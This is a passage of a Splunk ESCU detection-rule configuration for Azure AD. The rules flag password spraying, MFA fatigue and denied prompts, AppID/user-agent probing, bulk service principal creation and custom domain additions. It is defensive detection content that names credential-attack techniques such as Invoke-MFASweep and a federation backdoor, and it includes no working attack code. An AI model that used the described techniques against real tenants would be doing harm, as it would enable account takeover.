initial guidelines and should be customized based on the organization's user behavior and risk profile. Recognizing this behavior is vital for security operations centers (SOCs) as distributed password spraying represents a more complex form of traditional password spraying. Attackers distribute the source of their attempts to evade detection mechanisms that typically monitor for single-source IP anomalies. Prompt detection of such distributed activities is essential to thwart unauthorized access attempts, prevent account compromises, and mitigate the risk of further malicious activities within the organization's network. A true positive alert from this analytic suggests an active distributed password spraying attack against the organization's Azure AD tenant. A successful attack could result in unauthorized access, particularly to accounts with elevated privileges, leading to data breaches, privilege escalation, persistent threats, and lateral movement within the organization's infrastructure. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects potential distributed password spraying attacks within an Azure AD environment. It identifies a notable increase in failed authentication attempts across a variety of unique user-and-IP address combinations, originating from multiple source IP addresses and countries, and employing different user agents. Such patterns suggest an adversary's attempt to bypass security controls by using a range of IP addresses to test commonly used passwords against numerous user accounts. The detection scrutinizes SignInLogs from Azure AD logs, particularly focusing on events with error code 50126, which signals a failed authentication due to incorrect credentials. By collating data over a five-minute interval, the analytic computes the distinct counts of user-and-IP combinations, unique users, source IPs, and countries. It then applies a set of thresholds to these metrics to pinpoint unusual activities that could indicate a coordinated attack effort. The thresholds set within the analytic (such as unique IPs, unique users, etc.) are initial guidelines and should be customized based on the organization's user behavior and risk profile. Recognizing this behavior is vital for security operations centers (SOCs) as distributed password spraying represents a more complex form of traditional password spraying. Attackers distribute the source of their attempts to evade detection mechanisms that typically monitor for single-source IP anomalies. Prompt detection of such distributed activities is essential to thwart unauthorized access attempts, prevent account compromises, and mitigate the risk of further malicious activities within the organization's network. A true positive alert from this analytic suggests an active distributed password spraying attack against the organization's Azure AD tenant. A successful attack could result in unauthorized access, particularly to accounts with elevated privileges, leading to data breaches, privilege escalation, persistent threats, and lateral movement within the organization's infrastructure. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. The thresholds set within the analytic (such as unique IPs, unique users, etc.) are initial guidelines and should be customized based on the organization's user behavior and risk profile. Security teams are encouraged to adjust these thresholds to optimize the balance between detecting genuine threats and minimizing false positives, ensuring the detection is tailored to their specific environment. action.escu.known_false_positives = This detection may yield false positives in scenarios where legitimate bulk sign-in activities occur, such as during company-wide system updates or when users are accessing resources from varying locations in a short time frame, such as in the case of VPNs or cloud services that rotate IP addresses. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Multi-Source Failed Authentications Spike - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover", "NOBELIUM Group"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Multi-Source Failed Authentications Spike - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | eval uniqueIPUserCombo = src_ip . "-" . user | stats count min(_time) as firstTime max(_time) as lastTime dc(uniqueIPUserCombo) as uniqueIpUserCombinations, dc(user) as uniqueUsers, dc(src_ip) as uniqueIPs, dc(user_agent) as uniqueUserAgents, dc(location.countryOrRegion) as uniqueCountries values(user) as users, values(src_ip) as ips, values(user_agent) as user_agents, values(location.countryOrRegion) as countries | where uniqueIpUserCombinations > 20 AND uniqueUsers > 20 AND uniqueIPs > 20 AND uniqueUserAgents = 1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multi_source_failed_authentications_spike_filter` [ESCU - Azure AD Multiple AppIDs and UserAgents Authentication Spike - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is crafted to identify unusual and potentially malicious authentication activity within an Azure AD environment. It triggers when a single user account is involved in more than 8 authentication attempts, using 3 or more unique application IDs and more than 5 unique user agents within a short timeframe. This pattern is atypical for regular user behavior and may indicate an adversary's attempt to probe the environment, testing for multi-factor authentication requirements across different applications and platforms. The detection is based on analysis of Azure AD audit logs, specifically focusing on authentication events. It employs statistical thresholds to highlight instances where the volume of authentication attempts and the diversity of application IDs and user agents associated with a single user account exceed normal parameters. Identifying this behavior is crucial as it provides an early indication of potential account compromise. Adversaries, once in possession of user credentials, often conduct reconnaissance to understand the security controls in place, including multi-factor authentication configurations. Tools like Invoke-MFASweep are commonly used for this purpose, automating the process of testing different user agents and application IDs to bypass MFA. By detecting these initial probing attempts, security teams can swiftly respond, potentially stopping an attack in its early stages and preventing further unauthorized access. This proactive stance is vital for maintaining the integrity of the organization's security posture. If validated as a true positive, this detection points to a compromised account, signaling that an attacker is actively attempting to navigate security controls to maintain access and potentially escalate privileges. This could lead to further exploitation, lateral movement within the network, and eventual data exfiltration. Recognizing and responding to this early stage of an attack is vital for preventing substantial harm and safeguarding sensitive organizational data and systems. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This analytic is crafted to identify unusual and potentially malicious authentication activity within an Azure AD environment. It triggers when a single user account is involved in more than 8 authentication attempts, using 3 or more unique application IDs and more than 5 unique user agents within a short timeframe. This pattern is atypical for regular user behavior and may indicate an adversary's attempt to probe the environment, testing for multi-factor authentication requirements across different applications and platforms. The detection is based on analysis of Azure AD audit logs, specifically focusing on authentication events. It employs statistical thresholds to highlight instances where the volume of authentication attempts and the diversity of application IDs and user agents associated with a single user account exceed normal parameters. Identifying this behavior is crucial as it provides an early indication of potential account compromise. Adversaries, once in possession of user credentials, often conduct reconnaissance to understand the security controls in place, including multi-factor authentication configurations. Tools like Invoke-MFASweep are commonly used for this purpose, automating the process of testing different user agents and application IDs to bypass MFA. By detecting these initial probing attempts, security teams can swiftly respond, potentially stopping an attack in its early stages and preventing further unauthorized access. This proactive stance is vital for maintaining the integrity of the organization's security posture. If validated as a true positive, this detection points to a compromised account, signaling that an attacker is actively attempting to navigate security controls to maintain access and potentially escalate privileges. This could lead to further exploitation, lateral movement within the network, and eventual data exfiltration. Recognizing and responding to this early stage of an attack is vital for preventing substantial harm and safeguarding sensitive organizational data and systems. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. action.escu.known_false_positives = Rapid authentication from the same user using more than 5 different user agents and 3 application IDs is highly unlikely under normal circumstances. However, there are potential scenarios that could lead to false positives. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Multiple AppIDs and UserAgents Authentication Spike - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = $user$ authenticated in a short periof of time with more than 5 different user agents across 3 or more unique application ids. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Multiple AppIDs and UserAgents Authentication Spike - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs operationName="Sign-in activity" (properties.authenticationRequirement="multiFactorAuthentication" AND properties.status.additionalDetails="MFA required in Azure AD") OR (properties.authenticationRequirement=singleFactorAuthentication AND "properties.authenticationDetails{}.succeeded"=true) | bucket span=5m _time | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime dc(appId) as unique_app_ids dc(userAgent) as unique_user_agents values(appDisplayName) values(deviceDetail.operatingSystem) by user, src_ip | where count > 5 and unique_app_ids > 2 and unique_user_agents > 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_appids_and_useragents_authentication_spike_filter` [ESCU - Azure AD Multiple Denied MFA Requests For User - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic targets the detection of an unusually high number of denied Multi-Factor Authentication (MFA) requests for a single user within a 10-minute window, specifically identifying instances where more than nine MFA prompts were declined by the user. Utilizing Azure Active Directory (Azure AD) sign-in logs, particularly focusing on "Sign-in activity" events, it filters for scenarios where the MFA request was denied due to the user declining the authentication, as indicated by error code 500121 and additional details stating "MFA denied; user declined the authentication." The data is then aggregated into 10-minute intervals, counting distinct raw events and capturing the earliest and latest times of occurrence for each user. This behavior is significant for a Security Operations Center (SOC) as it could be an early indicator of a targeted attack or an account compromise attempt, with an attacker having obtained the user's credentials and the user actively declining the MFA prompts, preventing unauthorized access. A true positive detection would imply that an attacker is on the verge of gaining full access to the user's account, posing a threat that could lead to data exfiltration, lateral movement, or further malicious activities within the organization, necessitating immediate investigation and response to safeguard the organization's assets. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic targets the detection of an unusually high number of denied Multi-Factor Authentication (MFA) requests for a single user within a 10-minute window, specifically identifying instances where more than nine MFA prompts were declined by the user. Utilizing Azure Active Directory (Azure AD) sign-in logs, particularly focusing on "Sign-in activity" events, it filters for scenarios where the MFA request was denied due to the user declining the authentication, as indicated by error code 500121 and additional details stating "MFA denied; user declined the authentication." The data is then aggregated into 10-minute intervals, counting distinct raw events and capturing the earliest and latest times of occurrence for each user. This behavior is significant for a Security Operations Center (SOC) as it could be an early indicator of a targeted attack or an account compromise attempt, with an attacker having obtained the user's credentials and the user actively declining the MFA prompts, preventing unauthorized access. A true positive detection would imply that an attacker is on the verge of gaining full access to the user's account, posing a threat that could lead to data exfiltration, lateral movement, or further malicious activities within the organization, necessitating immediate investigation and response to safeguard the organization's assets. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category. action.escu.known_false_positives = Multiple denifed MFA requests in a short period of span may also be a sign of authentication errors. Investigate and filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Multiple Denied MFA Requests For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ denied more than 9 MFA requests in a timespan of 10 minutes. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Multiple Denied MFA Requests For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic targets the detection of an unusually high number of denied Multi-Factor Authentication (MFA) requests for a single user within a 10-minute window, specifically identifying instances where more than nine MFA prompts were declined by the user. Utilizing Azure Active Directory (Azure AD) sign-in logs, particularly focusing on "Sign-in activity" events, it filters for scenarios where the MFA request was denied due to the user declining the authentication, as indicated by error code 500121 and additional details stating "MFA denied; user declined the authentication." The data is then aggregated into 10-minute intervals, counting distinct raw events and capturing the earliest and latest times of occurrence for each user. This behavior is significant for a Security Operations Center (SOC) as it could be an early indicator of a targeted attack or an account compromise attempt, with an attacker having obtained the user's credentials and the user actively declining the MFA prompts, preventing unauthorized access. A true positive detection would imply that an attacker is on the verge of gaining full access to the user's account, posing a threat that could lead to data exfiltration, lateral movement, or further malicious activities within the organization, necessitating immediate investigation and response to safeguard the organization's assets. action.notable.param.rule_title = Azure AD Multiple Denied MFA Requests For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs operationName="Sign-in activity" | rename properties.* as * | search status.errorCode=500121 status.additionalDetails="MFA denied; user declined the authentication" | bucket span=10m _time | stats count min(_time) as firstTime max(_time) as lastTime by user, status.additionalDetails, appDisplayName, user_agent | where count > 9 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_denied_mfa_requests_for_user_filter` [ESCU - Azure AD Multiple Failed MFA Requests For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Azure AD tenant. Error Code 500121 represents a failed attempt to authenticate using a second factor. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. The reasons for these failure could be several, like the user not responding in time or receiving multiple duplicate MFA requests. Azure AD tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1078", "T1078.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Azure AD tenant. Error Code 500121 represents a failed attempt to authenticate using a second factor. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. The reasons for these failure could be several, like the user not responding in time or receiving multiple duplicate MFA requests. Azure AD tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category. action.escu.known_false_positives = Multiple Failed MFA requests may also be a sign of authentication or application issues. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Multiple Failed MFA Requests For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ failed to complete MFA authentication more than 9 times in a timespan of 10 minutes. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Multiple Failed MFA Requests For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1078", "T1078.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Azure AD tenant. Error Code 500121 represents a failed attempt to authenticate using a second factor. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. The reasons for these failure could be several, like the user not responding in time or receiving multiple duplicate MFA requests. Azure AD tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.notable.param.rule_title = Azure AD Multiple Failed MFA Requests For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs operationName="Sign-in activity" properties.status.errorCode=500121 properties.status.additionalDetails!="MFA denied; user declined the authentication" | rename properties.* as * | bucket span=10m _time | stats count min(_time) as firstTime max(_time) as lastTime by user, status.additionalDetails, appDisplayName, user_agent | where count > 9 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_failed_mfa_requests_for_user_filter` [ESCU - Azure AD Multiple Service Principals Created by SP - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection identifies when a single service principal in Azure AD creates more than three unique OAuth applications within a 10-minute span, potentially signaling malicious activity. It monitors the 'Add service principal' operation, focusing on the activity of service principals rather than individual users. By aggregating the creation events over a 10-minute period, the analytic tracks how many distinct OAuth applications are created by each service principal. This is key for SOC teams to pinpoint potential attack staging, where an attacker might use a compromised or malicious service principal to rapidly establish multiple service principals, facilitating network infiltration or expansion. While the default threshold is set to trigger on more than three applications, security teams should adjust this to fit their specific environment's norm action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection identifies when a single service principal in Azure AD creates more than three unique OAuth applications within a 10-minute span, potentially signaling malicious activity. It monitors the 'Add service principal' operation, focusing on the activity of service principals rather than individual users. By aggregating the creation events over a 10-minute period, the analytic tracks how many distinct OAuth applications are created by each service principal. This is key for SOC teams to pinpoint potential attack staging, where an attacker might use a compromised or malicious service principal to rapidly establish multiple service principals, facilitating network infiltration or expansion. While the default threshold is set to trigger on more than three applications, security teams should adjust this to fit their specific environment's norm action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = Certain users or applications may create multiple service principals in a short period of time for legitimate purposes. Filter as needed. action.escu.creation_date = 2024-02-07 action.escu.modification_date = 2024-02-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Multiple Service Principals Created by SP - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = Multiple OAuth applications were created by $src_user$ in a short period of time action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Multiple Service Principals Created by SP - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add service principal" properties.initiatedBy.app.appId=* | rename properties.* as * | bucket span=10m _time | rename targetResources{}.displayName as displayName | rename targetResources{}.type as type | rename initiatedBy.app.displayName as src_user | stats min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName dc(displayName) as unique_apps by src_user | where unique_apps > 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_service_principals_created_by_sp_filter` [ESCU - Azure AD Multiple Service Principals Created by User - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection focuses on identifying instances where a single user creates more than three unique OAuth applications within a 10-minute timeframe in Azure AD, a potential indicator of malicious activity. By monitoring the 'Add service principal' operation and aggregating the data with a 10-minute bucket span, it tracks the number of distinct OAuth applications created by each user. This analytic is crucial for SOC teams to detect possible staging of attacks, where an adversary might rapidly create multiple service principals as part of their infiltration or expansion strategy within the network. The threshold of three applications is set to flag unusual behavior, but security teams are advised to adjust this value to suit the normal operational patterns of their environment action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection focuses on identifying instances where a single user creates more than three unique OAuth applications within a 10-minute timeframe in Azure AD, a potential indicator of malicious activity. By monitoring the 'Add service principal' operation and aggregating the data with a 10-minute bucket span, it tracks the number of distinct OAuth applications created by each user. This analytic is crucial for SOC teams to detect possible staging of attacks, where an adversary might rapidly create multiple service principals as part of their infiltration or expansion strategy within the network. The threshold of three applications is set to flag unusual behavior, but security teams are advised to adjust this value to suit the normal operational patterns of their environment action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = Certain users or applications may create multiple service principals in a short period of time for legitimate purposes. Filter as needed. action.escu.creation_date = 2024-02-07 action.escu.modification_date = 2024-02-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Multiple Service Principals Created by User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = Multiple OAuth applications were created by $src_user$ in a short period of time action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Multiple Service Principals Created by User - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add service principal" properties.initiatedBy.user.id=* | rename properties.* as * | bucket span=10m _time | rename targetResources{}.displayName as displayName | stats min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName dc(displayName) as unique_apps by src_user | where unique_apps > 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_service_principals_created_by_user_filter` [ESCU - Azure AD Multiple Users Failing To Authenticate From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies one source Ip failing to authenticate with 30 unique valid users within 5 minutes. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password. This logic can be used for real time security monitoring as well as threat hunting exercises.\ Azure AD tenants can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold if needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies one source Ip failing to authenticate with 30 unique valid users within 5 minutes. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password. This logic can be used for real time security monitoring as well as threat hunting exercises.\ Azure AD tenants can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold if needed. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category. action.escu.known_false_positives = A source Ip failing to authenticate with multiple users is not a common for legitimate behavior. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Multiple Users Failing To Authenticate From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = Source Ip $src_ip$ failed to authenticate with 30 users within 5 minutes. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Multiple Users Failing To Authenticate From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats count min(_time) as firstTime max(_time) as lastTime dc(user) AS unique_accounts values(user) as user by src_ip | where unique_accounts > 30 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter` [ESCU - Azure AD New Custom Domain Added - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of a new custom domain within an Azure Active Directory tenant. Adding a custom domain is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of a new custom domain within an Azure Active Directory tenant. Adding a custom domain is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active 